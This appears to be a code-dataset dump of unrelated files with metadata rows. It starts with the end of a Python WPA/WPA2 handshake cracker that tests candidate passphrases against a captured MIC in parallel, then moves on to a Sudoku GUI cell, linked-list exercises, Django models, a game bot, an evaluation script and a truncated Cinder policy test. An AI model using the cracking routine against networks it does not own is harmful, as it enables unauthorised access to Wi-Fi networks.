ptk = hmac4times(pmk, pke)
if ord(data[6]) & 0b00000010 == 2:
calculatedMic = hmac.new(ptk[0:16], data, sha1).digest()[0:16]
else:
calculatedMic = hmac.new(ptk[0:16], data).digest()
if mic == calculatedMic:
foundPassQ.put(passPhrase)
def crack(ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue):
foundPassQ = Queue()
try:
timeA = datetime.now()
startSize = passQueue.qsize()
except:
pass
pool = Pool(numOfPs, crackProcess, (ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue, foundPassQ))
while True:
sleep(1)
try:
timeB = datetime.now()
currentSize = passQueue.qsize()
print str(100 - 100.0 * currentSize / startSize) + "% done. " + str((startSize - currentSize) / (timeB - timeA).total_seconds()) + " hashes per second"
except:
pass
if foundPassQ.empty():
if passQueue.empty():
returnVal = False
break
else:
passphrase = foundPassQ.get()
returnVal = passphrase
break
pool.terminate()
return returnVal
| 33.45 | 163 | 0.605879 |
aaf844dccdd148febc58c248704051fea8ef7efb | 1,256 | py | Python | gui_components/cell.py | FilipRistic2922/SudokuPy | 7098530d2fd9d82cc2e66649c993630ef6e5774a | [
"MIT"
] | null | null | null | gui_components/cell.py | FilipRistic2922/SudokuPy | 7098530d2fd9d82cc2e66649c993630ef6e5774a | [
"MIT"
] | null | null | null | gui_components/cell.py | FilipRistic2922/SudokuPy | 7098530d2fd9d82cc2e66649c993630ef6e5774a | [
"MIT"
] | null | null | null | import pygame
from gui_components.gui_util import get_font, BLACK, BLUE, GRAY
class Cell:
def __init__(self, value, row, col, width, height):
self.value = value
self.temp = 0
self.row = row
self.col = col
self.width = width
self.height = height
self.set_by_user = False
self.selected = False
def draw(self, win):
font = get_font("arial", 40)
gap = self.width / 9
x = self.col * gap
y = self.row * gap
if self.temp != 0 and self.value == 0:
text = font.render(str(self.temp), 1, GRAY)
win.blit(text, (x + 45, y + 5))
elif not (self.value == 0):
color = BLACK
if self.set_by_user:
color = BLUE
text = font.render(str(self.value), 1, color)
win.blit(text, (x + (gap / 2 - text.get_width() / 2), y + (gap / 2 - text.get_height() / 2)))
if self.selected:
pygame.draw.rect(win, BLUE, (x, y, gap, gap), 5)
def set_value(self, val, set_by_user: bool = False):
self.value = val
self.temp = 0
self.set_by_user = set_by_user
def set_temp(self, val):
self.value = 0
self.temp = val
| 27.304348 | 105 | 0.527866 |
aaf88ec65f719215938c906b09236be307dd6034 | 2,246 | py | Python | chapter2/remove_dups.py | MubashirullahD/cracking-the-coding-interview | f9595886967e7c63cec19028239e4289e9cd1f9e | [
"MIT"
] | 1 | 2021-12-01T13:26:10.000Z | 2021-12-01T13:26:10.000Z | chapter2/remove_dups.py | MubashirullahD/cracking-the-coding-interview | f9595886967e7c63cec19028239e4289e9cd1f9e | [
"MIT"
] | null | null | null | chapter2/remove_dups.py | MubashirullahD/cracking-the-coding-interview | f9595886967e7c63cec19028239e4289e9cd1f9e | [
"MIT"
] | null | null | null | """
Remove Dups: Write code to remove duplicates from an unsorted linked list.
FOLLOW UP
How would you solve this problem if a temporary buffer is not allowed?
"""
from linkedlist import linkedlist
def remove_dup(linked_list):
placeholder = dict()
pointer1 = linked_list.top # This guy deletes the dublicate nodes
pointer2 = linked_list.top.next # This guy finds the nodes to delete
if pointer2 is None: # Only one variable
return
placeholder[pointer1.data] = 1
while(pointer2.next is not None):
placeholder[pointer2.data] = placeholder.get(pointer2.data, 0) + 1
if placeholder[pointer2.data] > 1:
pointer1.next = pointer2.next
pointer2 = pointer2.next
else:
pointer1 = pointer2
pointer2 = pointer2.next
# Last node case
placeholder[pointer2.data] = placeholder.get(pointer2.data, 0) + 1
if placeholder[pointer2.data] > 1:
pointer1.next = pointer2.next
def _sort(linked_list):
#bubble sort
sorted = False
while(not sorted):
node = linked_list.top
sorted = True
while(node.next is not None):
if node.data > node.next.data:
sorted = False
tmp = node.data
node.data = node.next.data
node.next.data = tmp
node = node.next
def remove_dub_no_buff(linked_list):
# We may have to sort
_sort(linked_list)
pointer1 = linked_list.top
while (pointer1.next is not None):
if (pointer1.data == pointer1.next.data):
pointer1.next = pointer1.next.next
else:
pointer1 = pointer1.next
if __name__ == "__main__":
test_list = linkedlist(10)
test_list.top.append_to_tail(20)
test_list.top.append_to_tail(30)
test_list.top.append_to_tail(20) #
test_list.top.append_to_tail(40)
test_list.top.append_to_tail(20) #
test_list.top.append_to_tail(50)
test_list.top.append_to_tail(40) #
test_list.top.append_to_tail(50) #
print("Before removing ")
test_list.print_all()
remove_dub_no_buff(test_list)
print("After removing ")
test_list.print_all()
| 27.060241 | 77 | 0.629564 |
aaf93a0fc8d0fd36a7282b6699c6daddec972081 | 1,172 | py | Python | examples/sample.py | odra/habet | cb791c3367f06fff0a6557fe5697033b2262bfc8 | [
"MIT"
] | null | null | null | examples/sample.py | odra/habet | cb791c3367f06fff0a6557fe5697033b2262bfc8 | [
"MIT"
] | null | null | null | examples/sample.py | odra/habet | cb791c3367f06fff0a6557fe5697033b2262bfc8 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
import sys
sys.path.append('../')
from habet import Application, Response, Handler, errors
import json
#custom error register
class InvalidJSONError(errors.BaseServerError):
def __init__(self, *args, **kwargs):
super(InvalidJSONError, self).__init__(*args, **kwargs)
self.status = 400
self.code = -32005
self.message = 'Invalid JSON'
#root handler
class RootHandler(Handler):
def get(self):
return Response(body={'action': 'new'})
#name handler
class NameHandler(Handler):
def set_default_headers(self):
self.default_headers = {
'X-Custom-Header': 'My header',
'Content-Type': 'application/json'
}
def get(self):
return Response(body={'name': self.request.params['name']})
def post(self):
try:
body = json.loads(self.request.body)
except (TypeError, ValueError):
raise InvalidJSONError()
return Response(body=body)
def finish(self):
print app.some_var
print 'log stuff'
#application setup
app = Application(some_var='my var')
app.route('/', RootHandler)
app.route('/{name}', NameHandler)
#run app
if __name__ == '__main__':
app.listen()
| 21.309091 | 63 | 0.672355 |
aafaed7bd2fdeb1c2bbe286e7b1293532edfc8c8 | 2,516 | py | Python | api/models.py | mz-techops/banhammer | 02476db3d2bb617dbe50827687065fbea7553caf | [
"BSD-3-Clause"
] | 3 | 2018-03-09T23:29:25.000Z | 2020-11-25T15:34:13.000Z | api/models.py | whyallyn/banhammer | 59fc81b15d9950a7a40279a9d1df8101c58df569 | [
"BSD-3-Clause"
] | 3 | 2018-05-08T01:10:43.000Z | 2021-03-19T21:56:36.000Z | api/models.py | whyallyn/banhammer | 59fc81b15d9950a7a40279a9d1df8101c58df569 | [
"BSD-3-Clause"
] | 2 | 2018-05-10T15:07:24.000Z | 2018-06-20T16:24:00.000Z | """API Django models."""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Target(models.Model):
"""Definition of a Target."""
BAN = 'ban'
ALLOW = 'allow'
TARGET_ACTION_CHOICES = (
(BAN, "Ban"),
(ALLOW, "Allow"),
)
target_action = models.CharField(
max_length=5,
choices=TARGET_ACTION_CHOICES,
)
IPADDR = 'ip'
DOMAIN = 'domain'
URL = 'url'
HASH = 'hash'
USER = 'user'
TARGET_TYPE_CHOICES = (
(IPADDR, 'IP Address'),
(DOMAIN, 'Domain'),
(URL, 'URL'),
(HASH, 'Hash'),
(USER, 'User'),
)
target_type = models.CharField(
max_length=6,
choices=TARGET_TYPE_CHOICES,
)
target = models.CharField(max_length=900)
reason = models.CharField(max_length=50)
method = models.CharField(max_length=50)
user = models.CharField(max_length=255)
date_created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
permissions = (
('target_all_read', 'Read access for all Target types'),
('target_all_write', 'Write access for all Target types'),
('target_ipaddr_read', 'Read access for IP Target types'),
('target_ipaddr_write', 'Write access for IP Target types'),
('target_domain_read', 'Read access for Domain Target types'),
('target_domain_write', 'Write access for Domain Target types'),
('target_url_read', 'Read access for URL Target types'),
('target_url_write', 'Write access for URL Target types'),
('target_hash_read', 'Read access for Hash Target types'),
('target_hash_write', 'Write access for Hash Target types'),
('target_user_read', 'Read access for User Target types'),
('target_user_write', 'Write access for User Target types'),
)
def __str__(self):
return self.target
@python_2_unicode_compatible
class TargetIpAddr(models.Model):
"""Definition of an IP Address Target."""
ipaddr = models.CharField(max_length=45, unique=True)
ipaddr_action = models.CharField(
max_length=5,
choices=Target.TARGET_ACTION_CHOICES,
)
target = models.ManyToManyField(Target)
method = models.CharField(max_length=50)
def __str__(self):
return self.ipaddr
| 31.848101 | 76 | 0.636328 |
aafb1cf5d24f222fa6f06ff100c89a778fe48350 | 179 | py | Python | accounts/urls.py | Julmgc/Course-Organizer | b383f2845474314186a2ac6589885af890889da8 | [
"MIT"
] | null | null | null | accounts/urls.py | Julmgc/Course-Organizer | b383f2845474314186a2ac6589885af890889da8 | [
"MIT"
] | null | null | null | accounts/urls.py | Julmgc/Course-Organizer | b383f2845474314186a2ac6589885af890889da8 | [
"MIT"
] | null | null | null | from django.urls import path
from .views import UserLogin, UserRegister
urlpatterns = [
path("accounts/", UserRegister.as_view()),
path("login/", UserLogin.as_view()),
]
| 22.375 | 46 | 0.709497 |
aafb2505abc576fb91ec98a082757451092677b3 | 1,795 | py | Python | src/ranking_utils/scripts/preprocess.py | fknauf/ranking-utils | ce1a0be4e560d5f156a76cb5c0e3751793c67648 | [
"MIT"
] | null | null | null | src/ranking_utils/scripts/preprocess.py | fknauf/ranking-utils | ce1a0be4e560d5f156a76cb5c0e3751793c67648 | [
"MIT"
] | null | null | null | src/ranking_utils/scripts/preprocess.py | fknauf/ranking-utils | ce1a0be4e560d5f156a76cb5c0e3751793c67648 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import argparse
from pathlib import Path
from pytorch_lightning import seed_everything
from ranking_utils.datasets.antique import ANTIQUE
from ranking_utils.datasets.fiqa import FiQA
from ranking_utils.datasets.insuranceqa import InsuranceQA
from ranking_utils.datasets.trecdl import TRECDL2019Passage, TRECDL2019Document
from ranking_utils.datasets.trec import TREC
def main():
ap = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
ap.add_argument("SAVE", help="Where to save the results")
ap.add_argument(
"--num_neg_point",
type=int,
default=1,
help="Number of negatives per positive (pointwise training)",
)
ap.add_argument(
"--num_neg_pair",
type=int,
default=16,
help="Number of negatives per positive (pairwise training)",
)
ap.add_argument(
"--query_limit_pair",
type=int,
default=64,
help="Maximum number of training examples per query (pairwise training)",
)
ap.add_argument("--random_seed", type=int, default=123, help="Random seed")
subparsers = ap.add_subparsers(help="Choose a dataset", dest="dataset")
subparsers.required = True
DATASETS = [ANTIQUE, FiQA, InsuranceQA, TRECDL2019Passage, TRECDL2019Document, TREC]
for c in DATASETS:
c.add_subparser(subparsers, c.__name__.lower())
args = ap.parse_args()
if args.random_seed:
seed_everything(args.random_seed)
ds = None
for c in DATASETS:
if args.dataset == c.__name__.lower():
ds = c(args)
break
save_path = Path(args.SAVE)
ds.save(save_path, args.num_neg_point, args.num_neg_pair, args.query_limit_pair)
if __name__ == "__main__":
main()
| 29.42623 | 88 | 0.690808 |
aafc4992c92b83ce538e9440118f026965da7bbf | 6,158 | py | Python | camshot.py | corerd/camshot | b85787a27eac97ed6c9617203aab0e0a62a4960a | [
"MIT"
] | 1 | 2020-06-14T11:01:34.000Z | 2020-06-14T11:01:34.000Z | camshot.py | corerd/camshot | b85787a27eac97ed6c9617203aab0e0a62a4960a | [
"MIT"
] | null | null | null | camshot.py | corerd/camshot | b85787a27eac97ed6c9617203aab0e0a62a4960a | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# The MIT License (MIT)
#
# Copyright (c) 2014 Corrado Ubezio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from camshotcfg import ConfigDataLoad
from camgrab import imageCapture
from camshotlog import logInit, logAppend
from cloud import sync_with_cloud, check_and_reset_network_connection
from shutdown import shutdown, suspend, hasPrivilegesToShutdown
from daylight import DaylightRepeatingEvent
from time import time, sleep
from datetime import datetime
from sys import argv, exit
from os import makedirs, path
# Globals
DEFAULT_CONFIG_FILE = 'camshotcfg.json'  # config file used when none is given on the command line
APPLICATION_NAME = 'Camera Shot'
MAIN_SCRIPT_NAME = 'camshot.py'  # tag prepended to every log message

# Configuration parameter defaults
# (each of these is overwritten by configUpdate() when the JSON config is loaded)
WORKING_DIR = '.'  # base directory for grabbed pictures (config key 'camshot-datastore')
TIME_BEFORE_SHUTDOWN = 1 #minutes
TIME_ELAPSED_BETWEEN_SHOTS = 5*60 #seconds
TIME_DAYLIGHT_BEGIN = '0 8 * * 1-5' # cron like format: 08:00 from Monday to Friday
TIME_DAYLIGHT_END = '30 18 * * 1-5' # cron like format: 18:30 from Monday to Friday
SUSPEND_TO_MEMORY = False  # True when config 'suspend' == 'YES' (suspend instead of shutdown)
CAMERAS_LIST = []  # camera descriptors handed one-by-one to imageCapture()
class CamShotError(Exception):
    """Application-level error raised on unrecoverable camshot failures
    (e.g. the pictures directory cannot be created in grab()).

    The human-readable message is available both through ``str()`` and
    through the ``emesg`` attribute (kept for existing callers).
    """
    def __init__(self, emesg):
        # Forward the message to Exception so args/repr() behave
        # conventionally (the original left args empty).
        super(CamShotError, self).__init__(emesg)
        self.emesg = emesg
    def __str__(self):
        return "{0}".format(self.emesg)
def configUpdate(cfgFile):
    # Refresh the module-level configuration globals from the JSON config file.
    global TIME_ELAPSED_BETWEEN_SHOTS, TIME_DAYLIGHT_BEGIN, TIME_DAYLIGHT_END
    global WORKING_DIR, SUSPEND_TO_MEMORY, CAMERAS_LIST
    cfg = ConfigDataLoad(cfgFile)
    WORKING_DIR = cfg.data['camshot-datastore']
    # NOTE(review): eval() lets the config hold expressions like "5*60" (the
    # module default), but it executes arbitrary code from the config file -
    # consider int() or a restricted parser if the file is not fully trusted.
    TIME_ELAPSED_BETWEEN_SHOTS = eval(cfg.data['camshot-schedule']['seconds-to-wait'])
    TIME_DAYLIGHT_BEGIN = cfg.data['camshot-schedule']['start-time']
    TIME_DAYLIGHT_END = cfg.data['camshot-schedule']['end-time']
    # Suspend only when the config value is exactly the string 'YES'.
    SUSPEND_TO_MEMORY = (cfg.data['camshot-schedule']['suspend'] == 'YES')
    CAMERAS_LIST = cfg.data['cameras-list']
def get_delay_between_shots():
    # Compute how many whole seconds to wait until the next scheduled shot,
    # constrained to the configured daylight window (cron-like begin/end).
    wakeup_datetime = DaylightRepeatingEvent(TIME_ELAPSED_BETWEEN_SHOTS, TIME_DAYLIGHT_BEGIN, TIME_DAYLIGHT_END)
    now = datetime.now()
    next_datetime = wakeup_datetime.next_occurrence(now)
    logAppend('{0}: will resume at {1}'.format(MAIN_SCRIPT_NAME, next_datetime))
    # Truncate to whole seconds for suspend()/sleep timing.
    return int( (next_datetime-now).total_seconds() )
def grab(picturesBaseDir, cameraList):
    """Grab one picture per camera into <base>/CAMSHOT_<YYYYMMDD>/ (Python 2 module)."""
    # Make the grabbed picture file path
    now = datetime.now()
    picturesDirName = '{0:s}/CAMSHOT_{1:%Y%m%d}'.format(picturesBaseDir, now)
    try:
        makedirs(picturesDirName)
        logAppend('%s: create directory %s' % (MAIN_SCRIPT_NAME, picturesDirName))
    except OSError, e:
        if not path.isdir(picturesDirName):
            # If the directory doesn't already exist, there was an error on creation
            raise CamShotError("{0}: create directory {1} [OS errno {2}]: {3}".format(MAIN_SCRIPT_NAME, picturesDirName, e.errno, e.strerror))
    # Grab a picture from cameras; one file per camera: CS<YYYYMMDDHHMM>_<index>.jpg
    cameraIndex = 0
    for camera in cameraList:
        pictureFileFullName = '{0:s}/CS{1:%Y%m%d%H%M}_{2:02d}.jpg'.format(picturesDirName, now, cameraIndex)
        logAppend('%s: grab in file %s' % (MAIN_SCRIPT_NAME, pictureFileFullName))
        imageCaptureTries = 0
        # Retry a failed capture up to 3 times, sleeping 3 seconds between tries.
        while imageCaptureTries < 3:
            if imageCapture(camera, pictureFileFullName):
                break;
            sleep(3)
            imageCaptureTries = imageCaptureTries + 1
        if imageCaptureTries >= 3:
            # Log and carry on with the next camera rather than aborting the run.
            logAppend('%s: grab picture error' % (MAIN_SCRIPT_NAME))
        cameraIndex = cameraIndex + 1
def grabLoop(workingDir, cameraList, suspendToMemory):
    """Main capture loop: sync with the cloud, grab, suspend until the next slot.

    Returns 1 when the wake-up did not come from the RTC (interpreted by
    main() as the user stopping the script).
    """
    while True:
        tBegin = time()
        check_and_reset_network_connection()
        sync_with_cloud(120)
        # configUpdate(workingDir)
        grab(workingDir, cameraList)
        # Deduct the time already spent in this iteration from the delay.
        isResumedFromRTC = suspend(suspendToMemory, get_delay_between_shots() - (time()-tBegin))
        if not isResumedFromRTC:
            return 1
    return 0  # NOTE(review): unreachable - the loop only exits via "return 1"
def usage():
    """Print the command-line usage message (Python 2 print statement)."""
    print '%s usage:' % (APPLICATION_NAME)
    print '    %s [configuration_file]' % (MAIN_SCRIPT_NAME)
def main(argc, argv):
    """Entry point: parse argv, load the configuration and run the grab loop.

    Returns grabLoop()'s status (0/1), 1 on usage or privilege errors,
    2 on an unrecoverable exception.
    """
    global MAIN_SCRIPT_NAME
    MAIN_SCRIPT_NAME = path.basename(argv[0])
    configurationFile = DEFAULT_CONFIG_FILE
    if argc > 2:
        usage()
        return 1
    if argc == 2:
        configurationFile = argv[1]
    configUpdate(configurationFile)
    if SUSPEND_TO_MEMORY:
        # Suspend-to-RAM requires root privileges.
        if not hasPrivilegesToShutdown():
            print '%s: You need to have root privileges to run this script!' % (MAIN_SCRIPT_NAME)
            return 1
    logInit('{0}/{1}-log.txt'.format(WORKING_DIR, path.splitext(MAIN_SCRIPT_NAME)[0]))
    grabLoopExitStatus = 0
    try:
        grabLoopExitStatus = grabLoop(WORKING_DIR, CAMERAS_LIST, SUSPEND_TO_MEMORY)
    except Exception as e:
        #catch ANY exception
        logAppend('{0}: unrecovable exception {1}'.format(MAIN_SCRIPT_NAME, e))
        return 2 #severe error
    if grabLoopExitStatus == 1:
        logAppend('%s: stopped by the User' % (MAIN_SCRIPT_NAME))
    return grabLoopExitStatus
if __name__ == "__main__":
    ret = main(len(argv), argv)
    if ret is not None:
        # A severe error (2) while configured to suspend means the machine is
        # unattended: schedule a shutdown instead of leaving it running.
        if ret == 2 and SUSPEND_TO_MEMORY:
            logAppend('%s: system will shut down in %d minutes' % (MAIN_SCRIPT_NAME, TIME_BEFORE_SHUTDOWN))
            shutdown(TIME_BEFORE_SHUTDOWN)
        exit(ret)
| 39.729032 | 142 | 0.709159 |
aafcb95092c87ce209c68768cc38ba847d90f715 | 945 | py | Python | lightcycle-backend/lightcycle/basebot.py | Onapsis/pytron | 2ed0622ae13f010bcd8fdbbd2f1e9cba3d2e3d58 | [
"MIT"
] | null | null | null | lightcycle-backend/lightcycle/basebot.py | Onapsis/pytron | 2ed0622ae13f010bcd8fdbbd2f1e9cba3d2e3d58 | [
"MIT"
] | null | null | null | lightcycle-backend/lightcycle/basebot.py | Onapsis/pytron | 2ed0622ae13f010bcd8fdbbd2f1e9cba3d2e3d58 | [
"MIT"
] | null | null | null | # encoding=utf-8
import random
from collections import namedtuple
Point = namedtuple('Point', 'x y')  # grid offset (column, row)
# Unit moves on the arena grid; y grows downwards, so 'N' is (0, -1).
DIRECTIONS = {
    'N': Point(0, -1),
    'E': Point(1, 0),
    'S': Point(0, 1),
    'W': Point(-1, 0),
}
class LightCycleBaseBot(object):
    """Interface for light-cycle bots: subclasses choose the next move."""
    def get_next_step(self, arena, x, y, direction):
        # Must return one of the DIRECTIONS keys ('N', 'E', 'S' or 'W').
        raise NotImplementedError('Should return one Direction.')
class LightCycleRandomBot(LightCycleBaseBot):
    """Bot that keeps its heading while safe, otherwise picks a random free cell."""
    def get_next_step(self, arena, x, y, direction):
        """Return the key of a DIRECTIONS move leading to a free, in-bounds cell.

        Prefers the current direction; when every neighbouring cell is
        occupied the crash is unavoidable, so any random direction is
        returned as a fallback.
        """
        possible_movements = [key for key, value in DIRECTIONS.items()
                              if 0 <= x + value.x < arena.shape[0]
                              and 0 <= y + value.y < arena.shape[1]
                              and not arena[x + value.x, y + value.y]]
        if direction in possible_movements:
            return direction
        else:
            # list() keeps this working on Python 3 too, where dict.keys()
            # returns a view that random.choice() cannot index.
            return random.choice(possible_movements or list(DIRECTIONS))
| 27 | 73 | 0.583069 |
aafd6a05995c3be1c704460d3a42582a855ce32e | 6,629 | py | Python | TD1/utils/extrinsic.py | AntoineOrgerit/Web-Scrapping | 552f2f85d775ada9e85f897713d20de09c0919ed | [
"BSD-3-Clause"
] | null | null | null | TD1/utils/extrinsic.py | AntoineOrgerit/Web-Scrapping | 552f2f85d775ada9e85f897713d20de09c0919ed | [
"BSD-3-Clause"
] | null | null | null | TD1/utils/extrinsic.py | AntoineOrgerit/Web-Scrapping | 552f2f85d775ada9e85f897713d20de09c0919ed | [
"BSD-3-Clause"
] | null | null | null | """
This module allows to perform a specific extrinsic evaluation of files by a specified criteria.
Antoine Orgerit - François Gréau - Lisa Fougeron
La Rochelle Université - 2019-2020
"""
import langid
import json
import copy
import subprocess
from os import listdir, remove
from os.path import isfile, join
from utils.daniel.evaluate import get_results, get_dic
def print_TP_FP_FN_TN(tools_criterias_data):
    """
    Outputs TP, FP, FN and TN results of the evaluated files.

    Expects a mapping tool name -> sequence whose first element is a dict
    with the confusion-matrix counts ("TP", "FP", "FN", "TN").
    """
    print("TOOLS\t\t|TP\t|FP\t|FN\t|TN")
    print("------------------------------------------------")
    for tool in tools_criterias_data:
        # Tool names longer than 7 characters need one tab less to stay aligned.
        if len(tool) > 7:
            print(tool + "\t|", end="")
        else:
            print(tool + "\t\t|", end="")
        print(str(tools_criterias_data[tool][0]["TP"]) + "\t|" + str(tools_criterias_data[tool][0]["FP"]) + "\t|" + str(tools_criterias_data[tool][0]["FN"]) + "\t|" + str(tools_criterias_data[tool][0]["TN"]))
    print()
def print_FRP(tools_criterias_data, default_header_key):
    """
    Outputs F-score, Recall and Precision results of the evaluated files.

    default_header_key selects the tool whose criteria mapping defines the
    table columns; each tool entry is (confusion, overall F/R/P, per-criteria
    F/R/P dicts).
    """
    print("TOOLS\t\t|\t\tAll\t\t", end="")
    # Criteria headers get a variable amount of tab padding depending on their
    # length; very long names (>= 31 chars) also widen the data columns below.
    add_spacing = []
    for criteria in tools_criterias_data[default_header_key][2]:
        if len(criteria) >= 24:
            print("|" + criteria + "\t", end="")
            if len(criteria) >= 31:
                add_spacing.append(criteria)
        elif len(criteria) >= 16:
            print("|\t" + criteria + "\t", end="")
        elif len(criteria) >= 8:
            print("|\t" + criteria + "\t\t", end="")
        else:
            print("|\t\t" + criteria + "\t\t", end="")
    print()
    print("\t\t|\tF\tR\tP\t", end="")
    for criteria in tools_criterias_data[default_header_key][2]:
        print("|\tF\tR\tP\t", end="")
        if criteria in add_spacing:
            print("\t", end="")
    print()
    print("------------------------------------------------", end="")
    for criteria in tools_criterias_data[default_header_key][2]:
        print("--------------------------------", end="")
        if criteria in add_spacing:
            print("--------", end="")
    print()
    for tool in tools_criterias_data:
        if len(tool) > 7:
            print(tool + "\t", end="")
        else:
            print(tool + "\t\t", end="")
        # Overall F1/Recall/Precision first, then one F/R/P triple per criteria.
        print("|\t" + str(format(tools_criterias_data[tool][1]["F1-measure"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][1]["Recall"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][1]["Precision"], ".2f")) + "\t", end="")
        for criteria in tools_criterias_data[tool][2]:
            print("|\t" + str(format(tools_criterias_data[tool][2][criteria]["F1-measure"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][2][criteria]["Recall"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][2][criteria]["Precision"], ".2f")) + "\t", end="")
            if criteria in add_spacing:
                print("\t", end="")
        print()
    print()
def detect_language(file_path):
    """
    Allows to detect the language used in a file using the langid module.

    Returns langid's classification for the whole file content.
    """
    # Context manager guarantees the handle is closed even if reading or
    # classification raises (the previous explicit close() leaked it then).
    with open(file_path, "r", encoding="utf8") as file:
        language = langid.classify(file.read())
    return language
def delete_unused_files(clean_repository_json_path, files_to_evaluate):
    """
    Allows to remove unused files in the JSON file at clean_repository_json_path path that are not
    present in the JSON object files_to_evaluate.

    Returns the filtered repository dict (entries whose 'path' is in
    files_to_evaluate).
    """
    # Context manager closes the handle (json.load(open(...)) leaked it).
    with open(clean_repository_json_path, "r", encoding="utf8") as repository_file:
        clean_repository = json.load(repository_file)
    # Iterate over a snapshot of the keys because entries are removed on the fly.
    for entry_id in list(clean_repository):
        if clean_repository[entry_id]["path"] not in files_to_evaluate:
            clean_repository.pop(entry_id)
    return clean_repository
def prepare_json(json_content, path):
    """
    Allows to prepare a JSON object from the clean result json_content
    and specific tool files path.

    Each entry gets a 'document_path' (path prefix + relative 'path') and its
    French 'langue' key renamed to 'language'; the input is left untouched.
    """
    prepared = {}
    for identifier, infos in json_content.items():
        entry = dict(infos)
        entry["document_path"] = path + entry["path"]
        entry["language"] = entry.pop("langue")
        prepared[identifier] = entry
    return prepared
def process_corpus():
    """
    Allows to process the files present in eval.json using Daniel process_corpus.py file.

    Returns the file name (last path component) found on the script's
    second-to-last output line.
    """
    out = subprocess.check_output(['python', '../utils/daniel/process_corpus.py', '-c ../../exo5/eval.json'])
    # NOTE(review): assumes Windows-style "\r\n" line endings in the output.
    composed_out = out.decode('ascii').split("\r\n")
    composed_out = composed_out[len(composed_out) - 2].split("/")
    return composed_out[len(composed_out) - 1]
def evaluate(processed_file, criteria_extraction):
    """
    Allows to evaluate the result of the eval.json file with the gold.json reference file
    using Daniel evaluate.py file.
    """
    gold = get_dic('./gold.json')
    # 'eval' shadows the builtin; kept unchanged for byte-compatibility.
    eval = get_dic('./' + processed_file)
    return get_results(gold, eval, criteria_extraction)
def perform_extrinsic_evaluation(clean_repository_path_and_json, source_repositories_name_and_path, criteria_extraction, print_header_key=None):
    """
    Allows to perform an extrinsic evaluation from reference files path and json file clean_repository_path_and_json,
    files to evaluate linked to their generator tool source_repositories_name_and_path, using an extraction criteria
    criteria_extraction.

    Each tuple in source_repositories_name_and_path is (tool name, files dir);
    clean_repository_path_and_json is (reference dir, reference json path).
    Returns a dict tool name -> evaluation results and prints summary tables.
    """
    global_data = {}
    for source_repository_name_and_path in source_repositories_name_and_path:
        # Evaluate only the files actually produced by this tool.
        files_to_evaluate = [f for f in listdir(source_repository_name_and_path[1]) if isfile(join(source_repository_name_and_path[1], f))]
        clean_repository = delete_unused_files(clean_repository_path_and_json[1], files_to_evaluate)
        gold_json = prepare_json(clean_repository, clean_repository_path_and_json[0])
        eval_json = prepare_json(clean_repository, source_repository_name_and_path[1])
        # DANIEL reads gold.json/eval.json from the current working directory.
        gold_file = open("./gold.json", "w")
        gold_file.write(json.dumps(gold_json))
        gold_file.close()
        eval_file = open("./eval.json", "w")
        eval_file.write(json.dumps(eval_json))
        eval_file.close()
        processed_file = process_corpus()
        global_data[source_repository_name_and_path[0]] = evaluate(processed_file, criteria_extraction)
        # Clean up the temporary files produced for/by DANIEL.
        remove("./gold.json")
        remove("./eval.json")
        remove("./test.out")
        remove("./tmp")
        remove("./" + processed_file)
    print_TP_FP_FN_TN(global_data)
    if print_header_key != None:
        print_FRP(global_data, print_header_key)
    return global_data
| 38.994118 | 276 | 0.629808 |
aafdf4b1d0c84500a3e64c7af727b3f3bc824d1a | 5,002 | py | Python | cinder/tests/unit/policies/test_quotas.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 571 | 2015-01-01T17:47:26.000Z | 2022-03-23T07:46:36.000Z | cinder/tests/unit/policies/test_quotas.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 37 | 2015-01-22T23:27:04.000Z | 2021-02-05T16:38:48.000Z | cinder/tests/unit/policies/test_quotas.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 841 | 2015-01-04T17:17:11.000Z | 2022-03-31T12:06:51.000Z | # Copyright 2021 Red Hat, Inc.
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from cinder.api.contrib import quotas
from cinder.api import microversions as mv
from cinder.policies import quotas as policy
from cinder.tests.unit.api import fakes as fake_api
from cinder.tests.unit.policies import base
@ddt.ddt
class QuotasPolicyTest(base.BasePolicyTest):
    """RBAC checks for the os-quota-sets API with legacy (deprecated) rules."""
